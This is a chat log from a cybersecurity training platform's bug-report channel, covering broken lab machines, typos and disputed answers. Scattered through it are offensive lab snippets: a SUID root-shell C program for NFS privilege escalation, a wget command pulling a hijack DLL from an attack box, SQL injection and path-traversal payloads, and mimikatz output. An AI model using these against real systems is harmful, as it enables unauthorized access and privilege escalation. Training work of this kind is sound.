#room-bugs

Does it give compilation instructions too?

Yes

Lol

Oof

You done f’ed up

I didn't mess anything up lol. I followed it exactly

I think it’s probably an arch mixup

Run uname -a on both machines

And make sure both are x64_86

Or both aren’t

Nope

I got it

Finally

Jesus christ

The directions are wrong

It's says to compile with gcc -c FILENAME.c -o exploit -w

Removing the -c flag makes it work

No wait

Nvm

I have confirmed I'm blind

I read the instructions wrong fir the last hour

Disregard my rant

It good now?

Yep. Like I said. I'm blind

😂😂

Ight great

Hi, in the room "IDOR", the website is trying to say that "IDs" is the same as "IDS - Intrusion Detection Systems" and gives an explanation of that. Not really a bug but a bit misleading for new ppl:

Hey thanks (: this has been reported to the team

Gave +1 Rep to @bitter root

In the LinPrivesc room Task7 Privilege Escalation: SUID, the split view guacamole server seems to be down and tries to reconnect over and over. I think I tried Task8 and had the same issue so I am not sure if more of the tasks have this problem or if its a local issue for me

It may be the remote desktop after the guacamole, its just erroring before connecting

Hello hello

would you mind posting a screenshot please? @gritty mason

I'm pretty sure I know what stage of the connection that is resulting in the error but I'd just like to confirm if that's okay?

let me give it a shot

Thanks. I'm trying to recreate this now myself

Thanks Ben

Thanks for that, I know the issue. I've forwarded it on to appropriate party

np, i think some of the other tasks in that room may be affected as well

i think i tried the task after that and then switched to a different room

Coolio, this is being fixed rn

Cheers

Hello hello, this fix has been applied to all VMs in the linprivesc AND the windows priv esc (namely you'll notice that the timer has increased)

Fantastic, that was a quick turnaround!

😎 💪

fastest keyboards in the west

https://tenor.com/view/brahmanandam-showdown-gun-gif-13935831

i have unfortunate news, i tried again and noticed the timer was much longer but its still looping on connect after launch :/

oh no 😦 I tested task 7 and it connected okay for me with the fix

i dont need to be connected to openvpn for the split to work right

i think i tried both ways

Nope

that error usually just means "wait a bit longer and refresh" waiting another minute or two and refreshing the page usually fixes it

unless it's a bit of an obsecure issue

im going to terminate and hard refresh and wait a few mins

sure thanks

if it still doesnt load ill just come back to that one later

are you trying task 7 still on lin priv esc?

yeah the SUID one

okay bare with I'll do some more testing

no problem, thanks for helping, appreciated

i have it loading one more time here its got about a minute left to go

https://tenor.com/view/angry-girl-tantrum-upset-憤怒-gif-9982157

that is not at all what i tried to type lollllll

i have no idea how that appeared

im leaving it though

This is actually how I fix things btw just scream enough about it

that gif gets better with each loop im glad i accidented it

what i was trying to type was that its still looping here and i probably could have used ssh on openvpn but i was being lazy to use split and now im pot committed

im going to take a hack break, thanks for your help again, ill try the room again tomorrow

Gave +1 Rep to @dusky junco

On the IDOR room, task 7, on the last sentence it says IDs is the same as IDS - Intrusion Detection System
Not a bug per say but still can be misleading

yeah the keywords are case insensitive, which is a site bug i guess so maybe plop that in #site-bugs

Alright

https://tryhackme.com/room/winprivesc

Task 5
Finding DLL vulnerabilities
The task says that you could install the software on your own system to test for DLL vulns, but that it could give inaccurate results due to different system configurations. Then it turns around 2 sentences later and says that since procmon requires admin privs, you'll have to install the software on your own system.

Not necessarily a room breaking bug, or a bug at all. I just found it funny that it goes out of its way to tell you that installing the software on your own system can be inaccurate, only to tell you to do exactly that 2 sentences later.

Can anyone confirm that room https://tryhackme.com/room/kuberneteschalltdi2020 is still alive? I think it is dead as so far I was never able to connect to the cluster. Would be nice to get some feedback.

linprivesc > Privilege Escalation: PATH > What is the odd path in PATH? anyone face this problem ? there's no path has /4/4/ (4 characters) !!!

/home/matt

The question is wrong

thank u

this is what i think

#room-help message

So, another bug, this one is in task 5 of the windows privesc room.

So, Windows Defender is turned on, on the target machine, and sometimes it stops the dll hijacking exploit from working

Room URL: https://tryhackme.com/room/fileinc
JR Penetration Tester -> Introduction to Web Hacking -> File Inclusion -> Local File Inclusion - LFI#2

Typo: include(langauges/THM.php);
Change: include(languages/THM.php);

( @dusky junco )

Hello, what is this exactly, Jabba?

Typo I think

oh whoops

I didn't say what task this is

my brain conked out LMAO

Oh I don’t know

the irony

I can’t open the room

Looks like something called LFI#2

I reworded the email I was sent

How come you can't see it ?

It was a little hard to understand ngl

I don’t have premium

Room URL: https://tryhackme.com/room/linprivesc
JR Penetration Tester -> Privilege Escalation -> Linux PrivEsc -> Task 6 Privilege Escalation: Sudo -> first question

Typo: the user "user"
Change: the user "karen"

I'm new here. There doesn't appear to be a user "user" on that box though. Gave the answer for karen and it worked.

You get free premium!

It's on my alt

And I don't have the time to switch accounts rn

Inbox is full

Use your alt to check the room smh

People need answering

I'm doing this for the people!

The Task 5 - DLL Hijacking In the "Windows Privesc room" of the "Jr pentester path" has Win Defender still activated and removing the payloads we create (as shown in the task). Is this normal (I dont think it is) ?

cc @glad badger this has been reported a couple times now

Will have to look at this later. To be sure, you are saying that Defender is enabled on the target machine?

From what others have said, yes. And it impacts the way the room tells you to do it

Would be nice if Discord had a Save for Later option so I can save these issues into one channel for later. 😄

How to migrate 100,000 people to Slack 😂

Isn't this usually handled with QA tickets?

Yes, on the target 🙂

Absolutely

i found a bug for the walking an application room for the last question of task 3 i was able to locate what i believe the flag to be but its refusing it

Checking this now.

Try using (in PowerShell) wget -O hijackme.dll ATTACKBOX_IP:PORT/hijackme.dll on the target, instead of using certutil

room: https://tryhackme.com/room/oscommandinjection
task: 4

this works client side sure, but server side would still be a problem so this is still vulnerable

Wait, what?

@dusky junco that may need clarified, mate 😆
Not sure if you meant it to be vulnerable and that's just not made clear, or if you meant that as an example of a sanitised function

Because, uh, it really isn't 😆

Those also really should be code blocks rather than screenshots

the paragraph below that is checking server side, so maybe they should be combined to say something like client-side verification can be done with this method (pattern=x), however that's not enough because an attacker could intercept the request to bypass client-side controls. For this reason we also need to verify the input is a number server-side with this method (filter_input)

But isn't the input a string?
Like 10.10.10.10, these dots are being filtered by the set pattern
EDIT: these aren't filtered out automatically, only an information popup is shown by the browser that your input isn't valid

https://www.w3schools.com/tags/att_input_pattern.asp

@teal basalt No, not removed.
Just prevents submission

Ok👍
I haven't seen that room yet😅

My personal recommendation, and this will make you a better hacker, is to check the docs and see how it works before speculating about behaviour.

If you don't understand something, that's what the docs are for

Oh thank you
Actually, I had a similar check in one of my web application lately, and there I filtered out the input using oninput event😅
I will correct my earlier post

even if it was removing everything except that pattern, you can still bypass it by not even using the client

I have the same issue

room: https://tryhackme.com/room/sqlinjectionlm
task: 3

i think this section is formatted in a really confusing way. currently a section (in red) has either the "description text" above, below or above and below the table, which makes it confusing when reading about the next section

i would suggest for each section:

• what does the query do (for example, The first query type we'll learn is the SELECT query used to retrieve data from the database. )
• the query (for example, select * from users;)
• the table showing the results
• the explanation of the retrieved results (for example, The first-word SELECT tells the database we want to retrieve some data, the * tells the database we want to receive back all columns from the table. For example, the table may contain three columns (id, username and password). "from users" tells the database we want to retrieve the data from the table named users. Finally, the semicolon at the end tells the database that this is the end of the query. )
• <hr> to have a separator between each section

i edited the html to show sort of what i mean

On Cross-site scripting in Introduction to Web Hacking. Is this a known bug?

Oh I just saw it is

Change the . in the IP before p.thmlabs.com to -

hey for the network services 2 room, seclists doesn't seem to be installed in the kali attackbox, and when I try to install it I just get "unable to locate package seclists." Is this a known issue, user error, or something new?

SecLists

don't think apt is case sensitive, but could be wrong

regardless, no dice there

Hm. Weird. Try updating first?

already did

Huh

I'm out of ideas then

What os is that? Most os’s don’t have seclists in the repo

Try git cloning

I can, but this is about learning metasploit, will installing via git mess up the metasploit integration?

This is using the site's kali attack box

It shouldn't

You'll just have ti change the path

I don’t think so, but try seclists in /usr/share or in /opt

I think it’s there

not seeing it in either place, or did you meant to install it there?

No, I though it maybe there

Just git clone it, it’ll be the easiest

already did, but the documentation is pretty sparse, This is not seeming like a starting path room given the deviations from the instructions

Rooms aren’t always super accurate for attackbox and kali

I've already tried multiple other rooms to try and understand metasploit, and overall it's creating a very frustrating user experience.

The starting path just seems to assume familiarity, or links to rooms that get very esoteric very quickly

I've fixed this locally, and it will be live sometime today. Thanks for reporting and for giving easy reproduction steps.

Gave +1 Rep to @raven turtle

Noob question here. I am attempting to get root access on the Linux PrivEsc room - task 11.

Here is the code I am compiling with gcc.

int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}

After, I compile it with "gcc nfs.c -o nfs -w" and then use "chmod +s nfs" as the directions specify.

Next, going into the victim computer and using "./nfs" opens a new shell, but the shell remains as "karen".

Is this a bug?

If you want my opinion, go with a kali install on a VM and go in with a VPN. It's a much, much better experience.

I have that option set up, but one of the things I was actually finding value in was the fact that the vm's self destructed after a bit, so if I got interrupted in the lesson it forced me to go back and make sure I understood what I was doing if only through rote practice

I was kinda assuming at some point for the more challenging stuff it would make sense to have a dedicated box, so I did that already and tested it out as a proof of concept. But for now I'll keep going with the self destructive vm flashcards 😉

Just making sure, but you're transferring the file over nfs correct?

Hi Joker. Yes - I am. The file is being created on the mounted directory, causing it to appear on my machine as well as the machine that I am attacking.

Huh. That is weird.

Yeah - here is what I am seeing.

-rwsr-sr-x 1 kali kali 16088 Oct 22 21:54 exploit
-rw-r--r-- 1 kali kali 74 Oct 22 21:54 exploit.c

so it has the SUID bit

when I go to the other machine, the file is there and i see this

-rwsr-sr-x 1 ubuntu ubuntu 16088 Oct 23 01:54 exploit
-rw-r--r-- 1 ubuntu ubuntu 74 Oct 23 01:54 exploit.c

Did you compile it as root?

Because the file should be owned by root for it to work

i did not add "sudo" in front of gcc

There's your problem

it worked!

SUID keeps the file perms if the file owner. If the file is owned by root it is run as root. Since that file is owned by kali, or a low level user, nothing will change when you execute it as another low level user

wow. big learning moment.

thank you. such a basic concept and yet I didn't think about it.

No problem.

That depends on how the program handles privileges, tbf

If the program drops privileges then there's not a lot you can do about it

excellent advice. thank you both.

True true. I was talking in terms of the task he was doing but yea, that is something ti be aware of

still getting 502 bad gateway. I figured it out though. The site only works when I am not connected to the VPN

hi

the linux priv esc room - https://tryhackme.com/room/linprivesc
there is a typo..but can easily be customised or changes instead of changed

same room task 6

could the code be in a code block pls :p

LinPrivEscSUID machine didn't start why?

I tried to run it multiple times but the issue remains

same happened with me so i tried sshing

room/meterpreter
the links in task 2 are both broken. the text is correct. the hrefs are incorrect

thanks man it worked well

Gave +1 Rep to @wild bramble

@gleaming shadow

anyone noticed that the dig output in nslookup and dig in passiv recon is missing?! xD

so much for dig shows more info ^^

for whoever’s fixing the above, it’s because of the angle brackets in dig output, < and > need to be < and >

corp room broken

windows button, search function doesn't work. can't access powershell normally

And for anyone who wants to avoid that happening in the first place, a top tip: always encode your entire terminal text as HTML entities (e.g. through Burp Suite) before pasting it in, then save and refresh the page. The site will sanitise anything that needs to be sanitised, and decode everything else 🙂

Use this homie https://onlinetexttools.com/html-encode-text

Only convert the output/terminal text that you want to be displayed and not the entire snippet itself

i.e. this is what happens without it

convert

see the output that is no longer interpreted (:

Orrrrrr just encode the entire lot and let the site handle what it wants to leave encoded and what it's happy turning back to plain text 🤷‍♂️

i've always had issues with encoding the whole lot and certain things not rendering rigfht

(Means there are no compatibility issues with rendering engines)

Huh, that's strange

especially languages like XML

It's worked fine for me, although I can imagine XML potentially being a bit funky with it given it's basically HTML with no rules

I'd encode the whole thing (XML + the HTML snippet) and it'd encode the entire lot

only encode the XML and not the HTML snippet == success

very strange 😄

Wait, you're encoding the terminal block as well?

I was just meaning to encode the stuff you were putting in the terminal block

not to get it working

yeah

that

It was only when I was doing that it worked

Like here, for example:

I encoded this as HTML (all of it):

           

PS C:\Windows\system32> \\tsclient\share\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #```

Ah yea yeah

           

PS C:\Windows\system32> \\tsclient\share\x64\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #


        

Like, turned it into that

Then refreshed the page

That's how I do it for all of them 🤷‍♂️

I thought by all of it / everything you meant all of it including the terminal container and gubbins

Oh lord no 😆
Yeah, that would not end well

heyy, is there some bug in SQL Injection room from that new path? I am in Time based SQLi, and when I am querying, I get positive response only when querying for '_%' etc. For example, databased name was confirmed to be 9 times underscore, what is not a case here... I guessed a database name based on example query, and the user, and now I an on a password guessing, but it fails all queries except underscores. Edit: I did that, after reloading the machine I was capable to obtain password, but something is still wrong because the env does not respond properly for an example query referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';-- or even if I query its full name.

Hi all, in the room FILE INCLUSION > Task 4 > Question 1, my answer is correct but its not getting accepted.

Please check

Answer: /lab1.php?file=/etc/passwd

Hi there 🙂
In Holo, task 30, the link leads to a room that is set to private:
https://tryhackme.com/room/hololive

Ooh I need to remove that room from that definition

That is intentionally private for the time being 👀

@obtuse musk :^

Hi there. Certainly very minor but I thought I would point it out. In the Cross-site Scripting room (under Jr. Penetration Tester), the very first paragraph of Task 1 says, “However, none of the examples is overly complicated”. I believe the ‘is’ should be ‘are’ in that sentence. Again, minor, but wanted to pass it along anyway.

https://tryhackme.com/room/burpsuiteintruder task 5 question 3, Sniper is good for attacks where we are only attacking a single parameter, aye or nay? Answers is aye, but imho this should be "nay"? The examples given are two params username and password, so maybe I'm misunderstanding what is meant by param in this case

But which are you attacking?
Constant username, variable password? So you're only attacking the one parameter

Room: File Inclusion
Task 1: Introduction

Issue: The image says that get.php is the file name but is it really? I'd say the last bit in the image (i.e. userCV.pdf) is the file name.

They're both file names.
You're requesting get.php with parameters. The parameters happen to include a file name.

oh, okay, gotcha, please ignore then 😄

I see what you mean, I would probably not give an example of using sniper with 2 params(as you would probably use pitchfork in that case) and just show a bruteforce attack on a particular users password?

Is that not what's being done there?

username=§pentester§&password=§Expl01ted§ thats 2 params

sniper most likely would be used in username=pentester&password=§Expl01ted§ mode

It would, but then how would you know how Sniper behaves if you give it two parameters?

@obsidian kiln that is a good point, but I probably would first show with a single param, then with both and then explain that due to this behaviour its best suited for a single position attack(unless I'm missing use-cases for multiple positions)

It's quite literally in view from the last question 😆

but it doesn't give a proper reason @obsidian kiln it says before that

Notice how Intruder starts with the first position (username) and tries each of our payloads, then moves to the second position and tries the same payloads again. We can calculate the number of requests that Intruder Sniper will make as requests = numberOfWords * numberOfPositions.

That was written with the assumption that people would be able to understand the implications of an attack type that iterates through positions, especially given the example.
Regardless, whilst sniper is good for single parameter attacks (which is what the question is asking) it is not only used for single parameter attacks. It's not even necessarily designed for single parameter attacks -- it just lends itself to them

Failing to cover a multi-parameter attack with sniper would be failing to properly cover the functionality of the tool

The full functionality of the attack type is demonstrated, with each request shown. If you can't extrapolate the implications, or see the uses from that 🤷‍♂️
Also the reason why the webapp basic understanding rooms come first

In tickets2, it still says Lucky title in the FAQ

resolved ty

Gave +1 Rep to @eternal summit

Room: File Inclusion
Task 4: Local File Inclusion - LFI
Question: Give Lab #1 a try to read /etc/passwd. What would the request URI be?

Issue: the accepted answer is /lab1.php?file=/etc/passwd but this URI actually doesn't result in being able to read /etc/passwd in Lab 1 because of errors visible in the attached screenshot.

What does work is the following URI: /lab1.php?file=/../../../etc/passwd but this one is not accepted as a valid answer. So as a user I was basically able to read /etc/passwd using this path but it wasn't accepted as a valid answer so I'd say it's currently confusing to the user.

Adding a screenshot of the second mentioned URI that does display etc/passwd but isn't accepted as a valid answer to the question.

it looks like you entered in the input box /lab1.php?file=/etc/passwd when you should only be entering /etc/passwd

I'm so confused right now. Why would even /etc/passwd alone work if the current path is listed as /var/www/html? I thought the directory needs to be moved up first. 😮

i'm not connected atm so i can't check sorry :( but i came to my conclusion because of this in the error

lab 1 shows that the php code is

<?PHP 
    include($_GET["lang"]);
?>

in this case they just replace lang with file, so it includes anything in the file param, you can either input /etc/passwd into the box and it works or modify the URL to have it

on a different topic, in the burp lab when you login as admin there is a flag, is that used somewhere or was just missed as part of "CSRF Token Bypass" exercise?

Room: Linus PrivEsc (from new Jr penetration test, https://tryhackme.com/room/linprivesc)
Task 6
Issue:
The task is all about leveraging LD_PRELOAD, but when ssh'ing into the machine and using sudo -l the env_keep seems not to be availabe as shown in the pic

Well cant upload picture but if you follow the steps you can reproduce it

Room: https://tryhackme.com/room/passiverecon task 7, typo Shodian.io

QA had me remove the question in case people messed up the bruteforce and were unable to complete the room

Think of it as an easter egg 🤷‍♂️

room "Common Linux Privesc", Task 6.
/etc/passwd/
if insert string without Group ID (GID) counted as correct

Yeah, that's answer tolerance

room: NMAP live host discovery (JR penetration)
the view site option opens up a subnet diagram but if you try to send a packet, it doesnt work. Is this happening for everyone?

Room: https://tryhackme.com/room/xssgi

For any reason, by using the payload given at task 8 and port 1111 or 5555 (probably others <9000 as well), i received my own cookie.
By using port 9999, i managed to get the staff cookie.

Happened the same using the request catcher, attack box and my own kali machine.

idk if its a bug or its like that on purpose but i see no logic in it.

Try to reestablish the connection, or terminate the deployed instance of the target machine and redeploy it. 🙂 Hopefully that will help you.

Found a small grammar issue in “SQL Injections - Task 5”. As shown below, the “it’s we’ve” should most likely be just “we’ve” for the sentence to make sense. Hope that helps.

Fixed. Thank you for reporting. 🙂

Gave +1 Rep to @river timber

Happy to help!

https://tryhackme.com/room/winprivesc task 5, it is impossible to do a sc stop dllsvc as the service doesn't support it, which means if you upload the wrong hijack.dll its borked

Did you get around it? I cant start the service

https://tryhackme.com/room/winprivesc - There's a bug with Task 5 - you cannot start or restart the service "dllsvc" you get an error message

linuxprivesc task 11 is bugged as well

cant really exploit it.

tried multiple payloads

The nfs task

if anyone has been able to do it can you dm?

#junior-pentester-path ?

yep

Ask there if you want to check with other people please

Post here with a demonstration of the bug if it's actually bugged

ugh my bad

task 11

okay will send it

you can start it, but not stop it

I tried a few boxes and it wouldn’t start for me. Just hung on “starting”

I got an error when trying to start.

thats expected, it will still trigger the payload, when you start it it just stays at "starting"

I have a screenshot of the error message “service cannot start”

Might be just me, but I appear to be having some issues with the Linux Priv Escalation room. More specifically, I have been attempting Task 6 (sudo) and Task 7 (SUID) rooms. When launching the machine, I will always get a connection error with the machine trying to restart every 15 seconds. I can ssh into the machine via my Attack Box. However, in task 6, I do not see a LD_PRELOAD variable and in task 7 I am not able to nano /etc/shadow. Am I doing something wrong?

not a bug, please ask in #junior-pentester-path

not a bug please ask in #junior-pentester-path (hint its not ld_preload to get the flags)

Thank you, @snow badger

Gave +1 Rep to @snow badger

hello there, "Nmap Live Host Discovery" room, task 2 (Subnetworks) shows broadcast traffic being sent back to the source host, which is wrong. Switches forward broadcast to all ports but the one they receive packet from

also task4, "packet that computer1 received before being able to send the ping" should be "arp reply" not "arp response". Ofc this is a response but the message is called "arp reply" 🙂

you can almost always write to /tmp

For room: https://tryhackme.com/room/xssgi

On the final challenge, I've set the payload and I can get the cookie if I select the ticket (which I know my cookie isn't the answer) but it states to "wait up to a minute" and after multiple resets of the box I'm still having to wait 5-10 minutes with no cookie from the staff

I got annoyed by this aswell

Try using the requests catcher

Thats the only thing that worked for me

http://10.10.10.100/

https://tryhackme.com/room/protocolsandservers task 6. We are connected on the POP3 port. But the 2nd question is asking about "How many email messages are available to download via IMAP". Isn't it meant to ask about "How many email messages are available to download via POP3"? IMAP will be in the next task.

room: https://tryhackme.com/room/passiverecon
task: 4

the dig output is still not fully shown because of encoding issues

https://tryhackme.com/room/rpmetasploit task 7, search server/socks5 doesn't work, so while answer is auxiliary/server/socks5 it should be auxiliary/server/socks_proxy

i can't have my hacker role

Currently doing the https://tryhackme.com/room/burpsuiteom room and the last question in Section 6 is

"Compare the two responses by word. How many differences does Comparer detect in total?" the correct answer is ||9|| but when i compare i get an answer of 8. I think this is down to a potential difference in the time field, which may throw users off. If you send both requests within a minute of each other you have 1 less difference.

I've also just spotted there's a double space between the words "responses" and "by" in the question. Wouldn't have noticed except it took me a moment.

Either way it should pick up the seconds field? If anything, doing it outside of a minute would cause problems as it would go up to 10

seconds field counts as one word of the differences, and yes, doing it outside of a minute makes it go up to 9, which is the intended answer. if you took 10 minutes then i think it'd still count as the same word, and an hour to answer the question may be a little excessive.

I just did it inside of a minute and got 9

interesting, not sure how else to explain this, unless there's another point of variance in there too?

There's 2 off screen sections of difference in the cookie

The time field is identical for both?

Oh, wait. Tf

One sec

i did one, then another 6 minutes later, so two compares

Well, I just got 7, so that's unstable

Will rework it

a possible suggestion would be words of difference in the Set-Cookie field?

Hm?

The cookies won't consistently be in the same format unfortunately

aaah, that's fair then, i was trying to think what difference you're trying to highlight using the question, I guess it's based off the location and maybe redirect url? I'll leave you to it though, it's my bedtime 🙂

All I wanna do is get them to try it 😆

It showed me functionality I hadn't used, so thank you, is a good room for that

Gave +1 Rep to @obsidian kiln

I got 4 tickets for finishing https://tryhackme.com/room/tickets2 instead of 1?

I havent shared a link or finished any of the path rooms and may have spammed "click to redeem" a few times, but cba making another account to test it

Room: Passive Reconnaissance
Task 6: Shodan.io

Issue: question 3 asks about the 3rd most common port used for nginx. According to Shodan, this has now changed and the accepted answer on THM is outdated. The currently accepted answer is 8888 which is on #9 spot on Shodan; the third most common port is currently 5000. Screenshot as proof.

In https://tryhackme.com/room/windowseventlogs task 4

Execute the command from Example 7. Instead of the string Policy search for PowerShell. What is the name of the 3rd log provider?

Execute the command from Example 8. Use Microsoft-Windows-PowerShell as the log provider. How many event ids are displayed for this event provider?

The 2 questions above says to look into example 7 and 8, but in the documentation the examples i have to use are for the examples 8 and 9.

Hi there 🙂
In the holo live https://tryhackme.com/room/hololive, task 31, the hyperlink address to given file has changed.
It should be:
https://github.com/BC-SECURITY/Empire/blob/master/empire/server/common/bypasses.py

IDOR Room Task 7 the deploy machine is not working

@candid canyon

stop changing repo structure

Hey guys not sure where to post this but noticed a typo/grammer issue in Linux Fundamentals room part 2 task 3 "introduction to flags and switches" the last sentence in the first part says "...contents in the screenshots below are only examples and are not those of those the instance that you deploy in this room."

Burp suite room task 9 last question answer should be "a' or 1=1--" without the quotes, but when I click the submit button nothing happens.

You running bitdefender or something?

No

I guess I could try it from my home PC? I usually do THM from work, that's when I have the most time to do it lol

So it might be being blocked by some software running on your work PC or work network

Considering it's an SQL injection payload

That's also the old Burp Suite room -- it is unmaintained 🙂

should it not be deleted/archived now then

https://tenor.com/view/parks-and-recreation-tv-show-ron-swanson-nick-offerman-throwing-away-computer-gif-17541708

Hello. I am having issues with the Walking an Application room, Task 3, 3rd question; What is the directory listing flag? I believe I found it "THM{CHANGE_DEFAULT_CREDENTIALS}, but it will not accept that answer. I have answered the other (3) questions in this task, and this is the last one.

I just realized I may have put a Q/A out there, and I am sorry if I was NOT supposed to....my bad.

I don't even know if I am in the right room now, but this feels like a bug since its the last of (4) questions and it won't accept the answer. If I am in the wrong place I would appreciate if someone would guide me to the correct room. Thank you.

thanks for reporting. i've notified the creator

Gave +1 Rep to @versed yoke

looks like there was a commit to add an additional example to the doc -- https://github.com/MicrosoftDocs/PowerShell-Docs/commit/13c15ad7d853f512106e0a977daa93c9dc2812e9#diff-33e7acf7f8356bf18c72c3f3524ed6f6360cd166b13536143712cea76f8d5767. I'll let the creator know. thanks for reporting this.

Gave +1 Rep to @strong kelp

fixed this. thanks for reporting 🙂

Gave +1 Rep to @calm laurel

I guess this is a bug? Something wrong with a script?

Room is called Steel Mountain

Looks like instead of the actual script you downloaded some HTML response?

Did you download the raw file (https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1) ?

I am guessing you did wget on the link in the room which is a link to the github, not directly the "raw" script

Just checked, you are right, my mistake 😄

Thanks

Hello all 👋
I've got a lots of bugs on my throwback lab, is it possible to contact a modo or something ?

@twin tapir

Oh

-unmute @twin tapir

🔊 Unmuted Cryillic#0078

Protocols and Servers: POP3 second question seems to be in the wrong task

Please just post bugs in #743859653343182930 I don’t have the time to track down bugs individually

Not sure if this belongs here or if anyone cares but found a typo in the Jr Penetration Tester path > Introduction to Web Hacking > SQL Injection > Task 2

Fixed 🙂

Damn it Muiri I was literally hovering over "Save"

all fixed ^ (:

hah! in your face Muiri 😄 I got the ping off lmao!

Oi. I fixed that one 🤣

🤣

In Room linprivesc task 8
the flag permission is read by everyone instead of only by root.

JR Pentester Path:
Local File Inclusion 2 Lab 3:
Looks like there is a bug in THM since it accepts the wrong answer. Even if you missed the %00 at the end, you are right.

That's just answer tolerance

Hello there THM people. Have you tried this THM room by Tib3rius https://tryhackme.com/room/linuxprivesc

There is a question like so :
What is the name of the option that disables root squashing?

I think to prevent root squashing we should use root_squash in the /etc/exports file

But according to the room the answer it's no_root_squash 🤔

Having implemented that myself, I can confirm that it is no_root_squash

We have a levelling system based on how many messages you send in the server, provided by the MEE6 bot. Roles are automatically given as you level up, and they range from level 1-10.

• For every minute that you send a message in a text channel, you get a random amount of XP. (Talking in voice chats does not count.)
• The XP required to reach the next level increases significantly as you go up.
• High level members will receive rewards in the near future. 🎁

... Pardon?

If that's an attempt at a spam raid, it's gotta be the worst I've seen :kekw:

hi, I'm currently working through the File Inclusion room for the JR Pentesting Path and I am on Task 8 trying to submit flag 3. I've found the flag, but it's telling me the answer is wrong, and I've seen a few others in the forums have the same issue. Was wondering if there were any known fixes?

team

not able to connect to target machine

Task 6 Privilege Escalation: Sudo

connection error

Typo in https://tryhackme.com/room/dockerrodeo

thanks, good eye. fixed 🙂

Gave +1 Rep to @strong kelp

In the room: dogcat i cant open the website, the nmap only give me the port 22 open

In gamezone the first SQLi is missing terminator.
Should be:
' or 1=1; --

room/introtoshells: Task 7
question 2 accepts "socat TCP:<IP>...." when it should only accept "socat OPENSSL:<IP>...."

That's a site answer tolerance thing I'm afraid

Hmmmm maybe I'm thinking about this wrong but one of the questions in the burp-suite intruder seems a little off?

Should this not be 3 positions by the 100 possibilities ?

Answer gets 3 digits but surely it should be 100^3 which would be 1000000 no ?

Maybe its not a bug but just checking.

No. With Sniper:
requests = numberOfWords * numberOfPositions
It will go through every word and put it into each position once, ignoring the two other positions

Coolio thanks for that I retract my previous 😄

Lol also it would have to be the guy who wrote it who shoots me down 🤣 thanks @obsidian kiln

Hey there. In the ‘Protocols and Servers’ room, Task 6 (POP3), the second question asks about messages available via IMAP even though that isn’t covered until the next section in Task 7. Was it meant to be messages available via POP3? Attaching screenshot with answers and such removed to demonstrate.

How do I report a bug?

hello?

There is currently a bug in the room nax for the metasploit directory I checked a writeup to confirm.

If it's a site bug #site-bugs, if it's a room bug, #room-bugs, if it's a security bug: support@tryhackme.com 🙂

There are errors in the "How Websites Work" modules in Answer the following questions: Which term best describes the side on which your browser displays a website? answer: Front end. But the platform says it is wrong.

The answer was changed after the video was recorded. 🙂

Still, the answer can be found in the task content. 🥳

video?

answer is front end

What is another term for front-end?

but the question refers to the browser term

is front end

Read the question again.

What term best describes the side your browser renders a website

is front end

the question does not say who.

"describes the side"

What TERM best describes the side your browser renders a website? Answer is Front end. Because it speaks of the term, and not of who (client)

anyway thanks TIM

Gave +1 Rep to @glad badger

Hello

For Windows priv esc in jr pentester credentials are not provided for the machines

To ssh or rdp into

In Regular expressions, Task 5, Q.1, the answer format is missing 1 *

first part of answer is "^Password:" which is 9 * , while the answer format says its only 8 *

this confused me so much

ummm

so in the NAX room it seems that i cannot submit the right answer which is: || exploit/linux/http/nagios_xi_authenticated_rce ||

it keeps saying wrong incorrect answer but after saying eff it and went through a walk through to see if it was really right way of going through it and what do ya know its the right answer so why is it telling me its wrong?

🪲

oh no! A bug!

There isn't a bug but in NoSQL room a comma is missing.

Idk if it is important

safari Version 15.0 didnt allow me to complete some tasks and it is laggy, for exmaple i tried to complete the "view site" task but it wont work or would take time

i switched to chrome

its not a network error, my wifi is working fine. its an error in safari

Look through the later tasks. Its in one of them

oh ok

If I may ask, which room were you working on when you encountered an issue in Safari 15?

can anyone explain this error?

I need user ntlm hash but only getting the administrator one

It is last metasploit room of junior pentester path

I don't know where else to put it, but in room https://tryhackme.com/room/vulnerabilitycapstone
Task 2, last question, the hint says "You will need to setup a netcat reverse listener to gain access to the shell." but it's not always true: the exploit 47138 on EDB can be slightly modified to not need a reverse shell.

Noted, I'll update the hint @wheat fractal

"Some exploits will require you to setup a netcat reverse listener to gain access to the shell"

Yup that seems nice, feels like less of a honeypot haha. Have a nice day!

😄

Updated

Thanks for reporting. And you too (:

room: https://tryhackme.com/room/activerecon
task: 3

checking whether a remote system is online is the same as checking you have network connectivity to the remote system, is it not?

In other words, initially, this was used to check network connectivity; however, we are more interested in its different uses: checking whether the remote system is online.

same task

the last bullet point is covered by bullet point 2

even tho i changed it to computer 3 yesterday and clicked send packet it didnt work at all

until i switched to chrome and it worked

there is bug within safari

No. It's the same syntax, but you could already know that there's routing setup but not know if it's awake.

Thank you for reporting. We'll investigate this. It does work on Chrome, so I'd advise to use Chrome for now. 🙂

i understand that thought, but imo "network connectivity" implies that you can connect (ping in this case) over the network

It's definitely two very similar uses

fair

room: https://tryhackme.com/room/metasploitintro
task: 4

the Metasploit command prompt terminal block didn't work

This box is broke, i know how it sounds and you might think i might be doing something wrong(i have checking a walkthrough to a 'T') and this box is just broken
https://tryhackme.com/room/kuberneteschalltdi2020
it was working just fine but it just broke somehow and just refuses connection now even when using the file provided by the room

Good morning, it sounds like that machine might need some more resources assigning to it. I will check what it currently has, and see what I can do (:

Hello
I think the room Upload vulns https://tryhackme.com/room/uploadvulns has a bug

